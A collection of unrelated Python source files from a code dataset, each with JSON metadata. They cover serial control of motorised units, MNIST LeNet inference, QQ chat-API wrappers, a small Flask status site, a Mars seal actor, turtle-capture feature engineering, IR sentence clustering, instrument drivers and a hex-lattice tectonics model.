2000 x x means that only unit 1 will be moved to 2000, whereas units 2, 3 remain at their current position, only unit 2 would be x 2000 x, and only unit 3 would be x x 2000)\n#the expected time to finish is printed in the beginning\n#an overview of the current positions is printed every 5 sec\n#the speed of the movement is approx. 
10 mm/s\n#the setup of the units needs to be as follows: 1, 2, 3 at control box ports 1, 2, 3; usb-to-serial converter port 2)\n#in case of errors the script exits on 1\n\n\n\n\nimport platform\nimport serial\nimport time\nimport sys\nimport os\nfrom datetime import datetime\n\n\nport = 1\nbaudrate = 9600\n\n#time step for position update during movement 5 sec\ndelta_t = 5\n#average speed 10 mm / sec\nv = 10\n#bandlength\nlength = [9500, 8690, 9500]\n#precision\nprec = 10\n\n\n#read in positions\nend_pos = []\n\nfor unit_num in range(3):\n if len(sys.argv) - 1 == 3: \n if str(sys.argv[unit_num + 1]) == \"x\" or int(sys.argv[unit_num + 1] == -1):\n ext_pos = -1\n else:\n try:\n ext_pos = int(sys.argv[unit_num + 1])\n except(ValueError):\n print(\"Positions must be integer values between 0 and the corresponding bandlength (9500 mm (unit 1), 8690 mm (unit 2), 9500 mm (unit 3)), or <-1> or to keep the current position.\")\n sys.exit(1)\n \n elif len(sys.argv) - 1 == 1:\n try:\n ext_pos = int(sys.argv[1]) \n except(ValueError):\n print(\"Positions must be integer values between 0 and the corresponding bandlength (9500 mm (unit 1), 8690 mm (unit 2), 9500 mm (unit 3)), or <-1> or to keep the current position.\")\n sys.exit(1)\n \n else:\n print(\"Number of positions must be either 1 (for all units) or 3 (for all units individually). 
Use x to keep a unit at the current position.\")\n sys.exit(1)\n \n if -1 <= ext_pos <= length[unit_num]:\n end_pos.append(ext_pos) \n else:\n print(\"Positions must be integer values between 0 and the corresponding bandlength (9500 mm (unit 1), 8690 mm (unit 2), 9500 mm (unit 3)), or <-1> or to keep the current position.\")\n sys.exit(1)\n\n\n#prepare log-file\ntime_start = datetime.now().strftime(\"%H-%M-%S\")\ndate = datetime.now().strftime(\"%Y-%m-%d\") \nfile_name = datetime.now().strftime(\"%H-%M-%S\")\n\n#global port specification\nif platform.system() == \"Windows\":\n global_port_spec = 'COM'\n plat_sys = 1\n dir_name = 'C:/Users/ym-st/OneDrive/Desktop/GERDA_SIS/log/' + str(date)\n \nif platform.system() == \"Linux\":\n global_port_spec = '/dev/ttyMXUSB' \n plat_sys = 0 \n dir_name = 'log/' + str(date)\n \nport_spec = global_port_spec\nport += plat_sys\nport_spec += str(port)\n\nif not os.path.exists(dir_name):\n os.mkdir(dir_name)\n \nfile = open(dir_name +'/log-pos_' + file_name + '.txt', 'w')\nfile.write('Sending positions started at: ' + time_start + '\\n')\nfile.write('Script called with position specification (-1 <--> x (no movement)): ' + str(end_pos) + '\\n\\n')\n\n\n\n#checksum used to ensure correct communication\ndef check_sum (array): \n csum = (sum(array) & 255) ^ 255\n return csum\n\n\n#transmitting and receiving byte array\ndef tx_rx(tx_array, rx_length):\n communication_time = time.time() + 2 #maximal time span until communication is considered nonreliable 2 sec\n \n while True:\n if time.time() > communication_time:\n return 0\n \n #send tx_array\n ser = serial.Serial(port_spec, baudrate, timeout = 0.1)\n ser.write(bytearray(tx_array))\n \n #read in rx_array\n try:\n rx_array = ser.read(rx_length)\n rx_array = list(rx_array)\n acknow_byte = rx_array[2]\n ser.close()\n except (IndexError):\n ser.close()\n continue\n \n #check rx_array\n current_time = datetime.now().strftime(\"%H-%M-%S\")\n bits=['{0:08b}'.format(rx_array[n]) for n in 
range(len(rx_array))] \n \n if (rx_length == len(rx_array) and rx_array[0] == tx_array[0]): \n \n if (rx_length == 4 and acknow_byte != 0):\n print(\"Make sure that remote control mode is turned on!\")\n file.write(current_time + ': Make sure that remote control mode is turned on!\\n')\n file.write('Received bytes: ' + str(rx_array) + '\\n')\n file.write('Received bits: ' + str(bits) + '\\n')\n file.close()\n time.sleep(5)\n sys.exit(1)\n \n elif (rx_length == 6 and acknow_byte != 0):\n if acknow_byte == 1:\n print(\"Make sure that remote control mode is turned on!\")\n file.write(current_time + ': Make sure that remote control mode is turned on!\\n')\n if acknow_byte == 4:\n print(\"Position specifications invalid!\")\n file.write(current_time + ': Position specifications invalid!\\n')\n if acknow_byte == 8:\n print(\"A unit needs to be initialised before it can be moved!\")\n file.write(current_time + ': A unit needs to be initialised before it can be moved!\\n')\n \n file.write('Received bytes: ' + str(rx_array) + '\\n')\n file.write('Received bits: ' + str(bits) + '\\n')\n file.close()\n time.sleep(5)\n sys.exit(1)\n \n else:\n return rx_array\n \n time.sleep(0.1)\n \n \n \n \n#internal commands needed for approaching positions:\n#stop(): stop command is sent to all units; script is terminated, and exits on 1\n#get_status(): get current status for all units (1, 2, 3), returns initialisation and motor status of all 3 units\n#get_position(): get current positions (in mm) of units (1, 2, 3)\n#goto_position(unit, pos): send position to unit\n\n\ndef stop():\n err = 0\n cmd_byte = 195\n rx_length = 4\n \n for unit_num in range(3):\n #prepare tx_array\n tx_array = [cmd_byte,\n unit_num,\n cmd_byte ^ 255,\n unit_num ^ 255,\n cmd_byte ^ 255,\n unit_num ^ 255]\n tx_array.append(check_sum(tx_array))\n \n #send and receive\n rx_array = tx_rx(tx_array, rx_length)\n if rx_array == 0:\n err += 1 \n\n #error handling\n current_time = datetime.now().strftime(\"%H-%M-%S\") \n 
if err > 0:\n print(\"Communication error occured when sending stop command as backstop!\")\n file.write(current_time + ': Communication error occured when sending stop command as backstop!\\n') \n else:\n print(\"Stop command sent to each unit!\")\n file.write(current_time + ': Stop command sent to each unit!\\n')\n \n file.close()\n time.sleep(5)\n sys.exit(1)\n\n\ndef get_status(): \n err = 0\n cmd_byte = 51\n rx_length = 15\n \n rx_init = []\n rx_motor = [] \n rx_bits = []\n rx_bytes = []\n rx_status = []\n rx_error = []\n \n #prepare tx_array\n tx_array = [cmd_byte,\n 0,\n 0,\n 0,\n 0,\n 0] \n tx_array.append(check_sum(tx_array))\n \n #send and receive\n rx_array = tx_rx(tx_array, rx_length)\n if rx_array == 0:\n err += 1\n rx_init.extend((-1111, -1111, -1111))\n rx_motor.extend((-1111, -1111, -1111)) \n rx_bits.extend((-1111, -1111, -1111))\n rx_bytes.extend((-1111, -1111, -1111))\n rx_status.extend((-1111, -1111, -1111))\n rx_error.extend((-1111, -1111, -1111))\n \n #data processing\n else: \n rx_bits.append(['{0:08b}'.format(rx_array[n]) for n in range(len(rx_array))]) \n rx_bytes.append(rx_array) \n \n for unit_num in range(3):\n #initialisation status\n rx_init.append(rx_array[8 + unit_num] >> 2 & 1) \n #state of motor movement\n rx_motor.append(rx_array[8 + unit_num] & 3) \n #status flags\n rx_status.append(rx_array[8 + unit_num])\n #error flags\n rx_error.append(rx_array[11 + unit_num])\n \n print(\"----------Movement (0: idle/break, 1: down, 2: up):\",str(rx_motor))\n print(\"----------Initialisitaion status (0: not init., 1: init.):\",str(rx_init))\n print(\"----------Status flags:\",str(rx_status))\n print(\"----------Error flags:\",str(rx_error))\n\n current_time = datetime.now().strftime(\"%H-%M-%S\") \n file.write(current_time + ': Status check:\\n')\n file.write('Received bytes: ' + str(rx_bytes) + '\\n')\n file.write('Received bits: ' + str(rx_bits) + '\\n')\n file.write('Movement (0: idle/break, 1: down, 2: up): ' + str(rx_motor) + '\\n')\n 
file.write('Initialisitaion status (0: not init., 1: init.): ' + str(rx_init) + '\\n')\n file.write('Status flags: ' + str(rx_status) + '\\n') \n file.write('Error flags: ' + str(rx_error) + '\\n') \n\n status = [rx_init, rx_motor]\n \n #error handling \n if err > 0:\n print(\"Communication error occured during status check!\")\n file.write(current_time + ': Communication error occured during status check!\\n')\n stop()\n \n return status\n\n\ndef get_position(): \n err = 0\n cmd_byte = 85\n rx_length = 20\n \n inc_pos = []\n abs_pos = []\n discr = []\n pos = []\n \n #prepare tx_array\n cmd_byte = 85\n tx_array = [cmd_byte,\n 0,\n 0,\n 0,\n 0,\n 0]\n tx_array.append(check_sum(tx_array))\n \n #send and receive\n rx_array = tx_rx(tx_array, rx_length)\n if rx_array == 0:\n err += 1\n inc_pos.extend((-1111, -1111, -1111))\n abs_pos.extend((-1111, -1111, -1111))\n discr.extend((-1111, -1111, -1111))\n pos.extend((-1111, -1111, -1111))\n \n #data processing\n else:\n for unit_num in range(3):\n inc_pos.append(256 * rx_array[4 + 4 * unit_num] + rx_array[3 + 4 * unit_num])\n abs_pos.append(256 * rx_array[2 + 4 * unit_num] + rx_array[1 + 4 * unit_num])\n discr.append(inc_pos[unit_num] - abs_pos[unit_num])\n \n for unit_num in range(3):\n if not -20 <= inc_pos[unit_num] <= length[unit_num] + 100:\n inc_pos[unit_num] = -9999\n if not -20 <= abs_pos[unit_num] <= length[unit_num] + 100:\n abs_pos[unit_num] = -9999\n if (not -999 < discr[unit_num] < 999) or inc_pos[unit_num] == -9999 or abs_pos[unit_num] == -9999:\n discr[unit_num] = -9999\n \n #positions to be saved and returned\n if inc_pos[unit_num] != -9999:\n pos.append(inc_pos[unit_num])\n else:\n pos.append(abs_pos[unit_num])\n \n print(\"----------Incremental encoder:\",str(inc_pos)) \n print(\"----------Absolute encoder:\",str(abs_pos)) \n print(\"----------Discrepancies (incremental - absolute):\",str(discr)) \n print(\"\\nCURRENT POSITIONS:\",str(pos),\"\\n\")\n pos_file = open('current_positions.txt', 'w')\n 
pos_file.write('Positions:\\n' + str(pos) + '\\nIncremental encoder:\\n' + str(inc_pos) + '\\nAbsolute encoder:\\n' + str(abs_pos) + '\\nDiscrepancies (incremental - absolute):\\n' + str(discr))\n pos_file.close()\n \n current_time = datetime.now().strftime(\"%H-%M-%S\") \n file.write(current_time + ': Current positions: \\n')\n file.write('Incremental encoder: ' + str(inc_pos) + '\\n')\n file.write('Absolute encoder: ' + str(abs_pos) + '\\n') \n file.write('Discrepancies (incremental - absolute): ' + str(discr) + '\\n')\n \n #error handling \n if err > 0:\n print(\"Communication error occured during position check!\")\n file.write(current_time + ': Communication error occured during position check!\\n')\n stop()\n \n return pos\n \n\ndef goto_position(unit_num, pos):\n err = 0\n cmd_byte = 15\n rx_length = 6\n \n #prepare tx_array\n pos_lsb = pos & 255\n pos_msb = pos // 256\n tx_array = [cmd_byte,\n unit_num,\n pos_lsb,\n pos_msb,\n cmd_byte ^ 255,\n unit_num ^ 255]\n \n tx_array.append(check_sum(tx_array))\n \n #send and receive\n rx_array = tx_rx(tx_array, rx_length)\n if rx_array == 0:\n err += 1\n\n #error handling\n current_time = datetime.now().strftime(\"%H-%M-%S\")\n if err > 0:\n print(\"Communication error occured during transmission of desired position to units!\")\n file.write(current_time + ': Communication error occured during transmission of desired position to units!\\n')\n stop() \n\n\n\n\n#main program\n \n#check current position, transmit desired positions, print expected time needed to finish \nstatus = get_status()\npos = get_position()\ndiff = [0, 0, 0]\n\nfor unit_num in range(3):\n if end_pos[unit_num] != -1: \n diff[unit_num] = abs(pos[unit_num] - end_pos[unit_num])\n goto_position(unit_num, end_pos[unit_num])\n else:\n end_pos[unit_num] = pos[unit_num]\n \nprint(\"Next stop positions:\",str(end_pos),\"\\n\")\nfile.write('Next stop positions: ' + str(end_pos) + '\\n') \n\nt = int(max(diff) / v + 1)\n \ncurrent_time = 
datetime.now().strftime(\"%H-%M-%S\")\nprint(\"Expected time needed to approach positions (in sec):\",str(t),\"\\n\")\nfile.write(current_time + ': Expected time needed to approach positions (in sec): ' + str(t) + '\\n')\n \n#check positions and motor status during movement\nmax_time = time.time() + 60*20 #maximal waiting time 20 mins\nwhile True:\n \n current_time = datetime.now().strftime(\"%H-%M-%S\")\n if time.time() > max_time:\n print(\"Maximum waiting time has expired. Make sure that communication works properly.\")\n file.write(current_time + ': Maximum waiting time has expired. Make sure that communication works properly.\\n')\n stop()\n \n if 0 <= t <= delta_t:\n time.sleep(t)\n else:\n time.sleep(delta_t) \n \n status = get_status()\n pos = get_position()\n motor = status[1]\n \n #exit loop when motor(s) has/have stopped\n if all(elem == 0 for elem in motor):\n time.sleep(1)\n break\n \n#check that positions have been approached, and finish log-file \ndev = [pos[unit_num] - end_pos[unit_num] for unit_num in range(3)]\n\ntime_end = datetime.now().strftime(\"%H-%M-%S\")\n\nif all(abs(elem) <= prec for elem in dev):\n file.write('\\nPositions approached at: ' + time_end + '\\n')\n file.close()\n print(\"Positions approached.\")\n \nelse:\n file.write(current_time + ': Positions could not be approached successfully!\\n')\n file.close()\n print(\"Positions could not be approached successfully!\")\n sys.exit(1)\n \n#exit(0) \n \n \n\n","sub_path":"GERDA_SIS/pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":15472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189755307","text":"import numpy as np\nfrom mnist import MNIST\nfrom lenet import Lenet, relpath\n\n# -- load mnist data --\n\nmndata = MNIST(relpath('../data'))\nimages, labels = mndata.load_testing()\n\n# -- lenet inference --\n\nright = 0.\ntotal = 0.\n\nfor image, label in zip(images[:1000], labels[:1000]):\n print('LABEL:', 
label)\n #print(mndata.display(image))\n inputs = np.array(image, dtype=np.float32)\n inputs = np.reshape(image, (1, 28, 28))\n inputs = inputs * 0.00390625\n logits = Lenet(inputs)\n answer = np.unravel_index(np.argmax(logits, axis=None), logits.shape)[0]\n print('ANSWER:', answer)\n\n if label == answer:\n right += 1.\n total += 1.\n\nprint('ACCURACY:', right/total)\n\n","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"1216797","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom app import utils\nimport requests\n\n\nasync def chat_content(message):\n # 聊天的API地址    \n url = \"https://api.ai.qq.com/fcgi-bin/nlp/nlp_textchat\"\n # 获取请求参数  \n message = message.encode('utf-8')\n payload = utils.get_params(question=message, session='10000')\n # r = requests.get(url, params=payload)    \n r = requests.post(url, data=payload)\n if int(r.json()['ret']) != 0:\n return \"不听不听\"\n return r.json()[\"data\"][\"answer\"]\n\n\nasync def translation_content(target_language, message):\n url = \"https://api.ai.qq.com/fcgi-bin/nlp/nlp_texttranslate\"\n language_dict = {\n \"日语\": 'jp',\n \"英语\": 'en',\n \"韩语\": 'kr'\n }\n message = message.encode('utf-8')\n target_language = language_dict[target_language]\n payload = utils.get_params(target=target_language, source='zh', text=message)\n r = requests.post(url, data=payload)\n if int(r.json()['ret']) != 0:\n return \"我不会吖(ㄒoㄒ)\"\n return r.json()[\"data\"][\"target_text\"]\n","sub_path":"app/plugins/qq_api/data_source.py","file_name":"data_source.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437841238","text":"from flask import Flask, render_template\nimport datetime\nimport subprocess\napp = Flask( __name__ )\n\n@app .route( \"/\" )\ndef index():\n return \"Test page\"\n return 
\"<html><body><h1>This is my Site (Flask)</h1></body></html>\"\n\n@app.route(\"/Test01\")\ndef hello():\n now = datetime.datetime.now()\n timeString = now.strftime(\"%Y-%m-%d %H:%M\")\n templateData = {\n 'title' : 'RaspberryPi',\n 'time': timeString\n }\n return render_template('myTemplate03.html', **templateData)\n\n@app.route(\"/PioneerPi\")\ndef pioneerpi():\n now = datetime.datetime.now()\n timeString = now.strftime(\"%Y-%m-%d %H:%M\")\n templateData = {\n 'title' : 'PionnerPi',\n 'time': timeString\n }\n return render_template('myTemplate03.html', **templateData)\n\n@app.route(\"/\")\ndef action(DeviceName):\n return DeviceName\n\n\n@app.route(\"/Info\")\ndef getInfo():\n command = ['systemctl','status','raspotify']\n result = subprocess.run(['ls', '-l'], stdout=subprocess.PIPE)\n result = subprocess.run(command, stdout=subprocess.PIPE)\n return result.stdout\n\n \nif __name__ == \"__main__\" :\n app.run( host = '0.0.0.0' , debug = True )\n\n","sub_path":"REFERENCE/pi/mySite/mySite2.py","file_name":"mySite2.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618878786","text":"def validate(inputs):\n if inputs == '':\n return False\n return True\n\ndef hello(name):\n print('Hello ' + name + '.')\n\ninput_name=input('Input your Name.:')\n\nif validate(input_name) == False:\n print('Name is required.')\nelse:\n hello(input_name)\n","sub_path":"python_lesson/lesson3/sample/script3-9.py","file_name":"script3-9.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238513186","text":"\"\"\"\nGiven all the images in one single folder (the one that came on the zip file)\nseparetes them in two folders, train (80% of the images) and val (20% of the images)\n\"\"\"\n\nimport os\nimport numpy as np\n\n\nn_files = 202599\noriginal_folder = '../img_align_celeba'\ntrain_folder = 
'../train'\nval_folder = '../val'\n\n\nall_files = np.arange(1, n_files + 1)\nnp.random.shuffle(all_files)\n\ntrain = all_files[:int(0.8 * n_files)]\nval = all_files[int(0.8 * n_files):]\n\nfor i, file_idx in enumerate(train):\n os.rename(f'{original_folder}/{file_idx:06d}.jpg', f'{train_folder}/{i:06d}.jpg')\n\nfor i, file_idx in enumerate(val):\n os.rename(f'{original_folder}/{file_idx:06d}.jpg', f'{val_folder}/{i:06d}.jpg')","sub_path":"src/split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555616475","text":"class Solution(object):\n def duplicateInArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype int\n \"\"\"\n if nums == [] or max(nums) > len(nums) - 1:\n return -1\n\n # 取值范围\n start = 1\n end = len(nums) - 1\n\n while start < end:\n mid = (start + end) >> 1 # 取值范围划分为[start, mid], [mid+1, end]\n\n count = 0 \n for num in nums:\n if num >= start and num <= mid: # 统计半边\n count += 1\n\n if count > mid - start + 1:\n end = mid\n else:\n start = mid + 1\n\n return end # 当 start = end 结束查找\n","sub_path":"剑指offer/Week01/不修改数组找出重复数字/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"473150517","text":"# Copyright 1999-2018 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 
License.\n\nimport numpy as np\nimport pyarrow\n\nfrom ..config import options\nfrom ..errors import SpillNotConfigured\nfrom ..serialize import dataserializer\nfrom ..utils import log_unhandled\nfrom .spill import build_spill_file_name\nfrom .utils import WorkerActor\n\n\nclass SealActor(WorkerActor):\n \"\"\"\n Actor sealing a chunk from a serials of record chunks.\n \"\"\"\n @staticmethod\n def gen_uid(session_id, chunk_key):\n return 's:0:seal$%s$%s' % (session_id, chunk_key)\n\n def __init__(self):\n super(SealActor, self).__init__()\n self._chunk_holder_ref = None\n self._mem_quota_ref = None\n\n def post_create(self):\n from .chunkholder import ChunkHolderActor\n from .quota import MemQuotaActor\n super(SealActor, self).post_create()\n self._chunk_holder_ref = self.promise_ref(ChunkHolderActor.default_uid())\n self._mem_quota_ref = self.promise_ref(MemQuotaActor.default_uid())\n\n @log_unhandled\n def seal_chunk(self, session_id, graph_key, chunk_key, keys, shape, record_type, dtype, fill_value):\n from ..serialize.dataserializer import decompressors, mars_serialize_context\n chunk_bytes_size = np.prod(shape) * dtype.itemsize\n self._mem_quota_ref.request_batch_quota({chunk_key: chunk_bytes_size})\n if fill_value is None:\n ndarr = np.zeros(shape, dtype=dtype)\n else:\n ndarr = np.full(shape, fill_value, dtype=dtype)\n ndarr_ts = np.zeros(shape, dtype=np.dtype('datetime64[ns]'))\n\n # consolidate\n for key in keys:\n try:\n if self._chunk_store.contains(session_id, key):\n buf = self._chunk_store.get_buffer(session_id, key)\n else:\n file_name = build_spill_file_name(key)\n # The `disk_compression` is used in `_create_writer`\n disk_compression = dataserializer.CompressType(options.worker.disk_compression)\n if not file_name:\n raise SpillNotConfigured('Spill not configured')\n with open(file_name, 'rb') as inf:\n buf = decompressors[disk_compression](inf.read())\n buffer = pyarrow.deserialize(memoryview(buf), mars_serialize_context())\n record_view = 
np.asarray(memoryview(buffer)).view(dtype=record_type, type=np.recarray)\n\n for record in record_view:\n idx = np.unravel_index(record.index, shape)\n if record.ts > ndarr_ts[idx]:\n ndarr[idx] = record.value\n finally:\n del buf\n\n # clean up\n self._chunk_holder_ref.unregister_chunk(session_id, key)\n self.get_meta_client().delete_meta(session_id, key, False)\n self._mem_quota_ref.release_quota(key)\n\n # Hold the reference of the chunk before register_chunk\n chunk_ref = self._chunk_store.put(session_id, chunk_key, ndarr)\n self.get_meta_client().set_chunk_meta(session_id, chunk_key, size=chunk_bytes_size,\n shape=shape, workers=(self.address,))\n self._chunk_holder_ref.register_chunk(session_id, chunk_key)\n del chunk_ref\n","sub_path":"mars/worker/seal.py","file_name":"seal.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"141275424","text":"# Goal is to prepare the train.csv for modelling - here we can create a def/class\n# to apply to the different dataframes.\n# We want the dataframe of the following shape given the exploration :\n# target : number_capture\n# features : site_id, quarter, month, year, day_of_week, number_unique, likely_site, m_f_ratio\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import FormatStrFormatter\nimport calendar\n\nos.chdir(\"/Users/panthera_pardus/Documents/ds_projects/turtle_forcast\")\n\n#%% Read data\n# Since the goal is to forcast for 2019, let us separate the sets of 2017 and 2018\ndata = pd.read_csv(\"data/train.csv\")\ndata[\"dt_caught\"] = pd.to_datetime(data[\"Date_TimeCaught\"])\ndata.columns\n# Target : number_capture_day\ndf_target = data.groupby([\"CaptureSite\", \"Date_TimeCaught\"]).\\\ncount()[\"Rescue_ID\"].\\\nreset_index()\n\ndf_target[\"Site_Date\"] = df_target[\"CaptureSite\"] + \"_\" + 
df_target[\"Date_TimeCaught\"]\ndf_target[\"Site_Date\"] = df_target[\"Site_Date\"].str.replace(\"-\", \"\")\ndf_target[\"target\"] = df_target[\"Rescue_ID\"]\n\ndf_target = df_target[[\"Site_Date\", \"CaptureSite\", \"Date_TimeCaught\", \"target\"]]\n\n# Time dimension variables : quarter, month, year, day_of_week\ndata[\"quarter\"] = data.dt_caught.dt.quarter\ndata[\"month\"] = data.dt_caught.dt.month\ndata[\"day_of_week\"] = data.dt_caught.dt.dayofweek\n\ndf_time = data[[\"CaptureSite\", \"Date_TimeCaught\", \"quarter\", \"month\", \"day_of_week\"]]\ndf_time[\"Site_Date\"] = df_time[\"CaptureSite\"] + \"_\" + df_time[\"Date_TimeCaught\"]\ndf_time[\"Site_Date\"] = df_time[\"Site_Date\"].str.replace(\"-\", \"\")\n\ndf_time = df_time[[\"Site_Date\", \"quarter\", \"month\", \"day_of_week\"]]\n\n# Site dimension variables : number_unique_fishermen, likely_site, m_f_ratio\ndata.groupby(\"CaptureSite\").\\\ncount()\n","sub_path":"feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210988969","text":"\"\"\"IR sentence\n\"\"\"\n\nclass IRSentence(object):\n \"\"\"\n Representation of Sentence.\n \"\"\"\n\n def __init__(self, text, bug_id = None):\n self.__text = text\n self.__bug_id = bug_id\n\n self.__termcount = None\n self.__tfidf = None\n\n def get_text(self):\n return self.__text\n\n def get_bug_id(self):\n return self.__bug_id\n\n def get_termcount(self):\n if self.__termcount is None:\n from ir_term_count import IRTermCount\n self.__termcount = \\\n IRTermCount.get_bow(self.get_text(), True)\n return self.__termcount\n\n def contain_term(self, term):\n if self.get_termcount().has_key(term):\n return True\n else:\n return False\n\n def get_tfidf(self):\n if self.__tfidf is None:\n from ir_config import IRConfig\n from ir_mongodb_helper import IRMongodbHelper\n from ir_tfidf import IRTFIDF\n description_name = 
IRConfig.get_instance().get('bug_description_name')\n tfidf_collection = IRMongodbHelper.get_instance().get_collection(\n 'bug_db_name', 'bug_tfidf_collection_name', False)\n bug_count = tfidf_collection.count()\n \n self.__tfidf = \\\n IRTFIDF.calculate_tfidf(self.get_termcount(),\n description_name, bug_count, None, 'tfidf')\n return self.__tfidf\n\n @classmethod\n def get_sentence_from_description(cls, description, bug_id = None):\n \"\"\"Generate sentences from description.\n\n Args:\n description: str\n bug_id: int\n\n Returns:\n [[ArIRSentence]\n \"\"\"\n \n import re\n sentences = []\n sentences_text = re.split('\\.[ \\n]|\\n\\n', description)\n for text in sentences_text:\n text.replace('\\n', ' ')\n sentences.append(IRSentence(text, bug_id))\n return sentences\n\n @classmethod\n def cluster_sentences(cls, sentences, n):\n \"\"\"Cluster the sentences into n clusters.\n\n Args:\n sentences: [IRSentence]\n n: int, number of clusters\n\n Returns:\n [int], group id of each sentence in sentences\n \"\"\"\n\n vol = set()\n for sentence in sentences:\n tfidf = sentence.get_tfidf()\n for term in tfidf:\n vol.add(term)\n vol = list(vol)\n vecs = []\n for sentence in sentences:\n tfidf = sentence.get_tfidf()\n vec = []\n for term in vol:\n if term in tfidf:\n vec.append(tfidf[term])\n else:\n vec.append(0.0)\n vecs.append(vec)\n # call pycluster k-means\n from Pycluster import kcluster, clustercentroids, distancematrix\n labels, error, nfound = kcluster(vecs, nclusters=n, method='a',\n dist='u')\n centroids, cmask = clustercentroids(vecs, clusterid=labels, method='a')\n sentence_ids = []\n for centroid_index, centroid in enumerate(centroids):\n # find vecs in the cluster\n subvecs = [centroid]\n subvecindexs = [-1]\n for label_index, label in enumerate(labels):\n if label == centroid_index:\n subvecs.append(vecs[label_index])\n subvecindexs.append(label_index)\n # find the min dist vec\n matrix = distancematrix(subvecs, dist='u')\n minimum = 100000\n minimum_index = 
0\n for i in xrange(1, subvecs.__len__()):\n dist = matrix[i][0]\n if dist < minimum:\n minimum = dist\n minimum_index = subvecindexs[i]\n sentence_ids.append(minimum_index)\n\n # method='a')\n return labels, sentence_ids\n # return index of sentences, sentence of ids\n","sub_path":"server/bin/ir_sentence.py","file_name":"ir_sentence.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387272692","text":"# -*- coding: utf-8 -*-\n# #####################################################################\n# Implement controlling module of instruments\n#\n#\n# Created: Sat Sep 15 20:33:19 2018\n# by: Jim Lin(jim.lin@silabs.com)\n#\n# #####################################################################\n\n\nimport visa\nimport pkgutil\nfrom xml_config import *\nimport instruments_drivers.E4405B\nimport instruments_drivers.E4432B\n\ndriver_modules = {\"E4405B\":instruments_drivers.E4405B,\n \"E4432B\":instruments_drivers.E4432B}\n# for _, name, __ in pkgutil.iter_modules(instruments_drivers.__path__):\n# if \"instbase\" != name:\n# m = _.find_module(\n# 'instruments_drivers.' +\n# name).load_module(\n# 'instruments_drivers.' 
+\n# name)\n# driver_modules[name] = m\n\n\ndef instru_get_modal(resid):\n # type: (object) -> object\n rm = visa.ResourceManager()\n inst = rm.open_resource(resid)\n inst.timeout = 500\n inst_info = inst.query(\"*IDN?\")\n inst_info = inst_info.splitlines(False)\n inst_info = inst_info[0]\n inst_info.strip()\n vendor, modal, serialno, version = inst_info.split(\",\")\n return modal.strip().encode(\"ascii\")\n\n\ndef instru_init_inst(resid, logfunc):\n modal = instru_get_modal(resid)\n driver = cfg_get_driver_name_bymodal(modal)\n if not driver:\n raise Exception(\"Drivers for instrument %s not found!\" % modal)\n driverclass = getattr(driver_modules[driver], driver)\n obj = driverclass(resid)\n if logfunc is not None:\n if obj is not None:\n logfunc(\n \"Initializing driver(%s) for modal(%s) success!\" %\n (driver, modal))\n else:\n logfunc(\n \"Initializing driver(%s) for modal(%s) fail!\" %\n (driver, modal))\n obj.reset_to_default()\n return obj\n","sub_path":"python/pyate/instruments.py","file_name":"instruments.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"541254966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nhex_lattice_tectonicizer.py\n\nModels discrete normal-fault offset on a 2D hex lattice with a rectangular\nshape and with one orientation of the nodes being vertical.\n\nThe intention here is to use a particle (LCA) model to represent the evolution\nof a 2D hillslope, with the hex_lattice_tectonicizer serving to shift the nodes\neither upward (simple vertical uplift relative to baselevel), or up and\nsideways (representing motion on a fault plane).\n\nCreated on Mon Nov 17 08:01:49 2014\n\n@author: gtucker\n\"\"\"\n\nfrom landlab import HexModelGrid\nfrom numpy import amax, zeros, arange\nfrom pylab import figure\n\n_DEFAULT_NUM_ROWS = 20\n_DEFAULT_NUM_COLS = 15\n_TAN60 = 1.732\n\n\nclass HexLatticeTectonicizer(object):\n \"\"\"Base class from which 
